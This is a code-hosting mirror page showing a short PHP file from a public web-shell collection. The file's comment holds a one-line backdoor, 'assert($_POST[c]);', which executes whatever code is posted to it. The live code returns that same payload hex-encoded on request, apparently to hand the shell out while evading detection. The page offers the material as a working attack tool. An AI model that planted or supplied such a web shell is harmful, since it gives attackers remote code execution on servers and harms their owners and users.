1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00
Files
webshell/php/tank96a/getcode.php
2015-06-10 08:45:17 +08:00

8 lines
145 B
PHP

<?php
//getcode.php
//assert($_POST[c]);
$cmd=$_GET['call'];
if ($cmd=='code')
echo sprintf('61737365727428245f504f53545b635d293b');
?>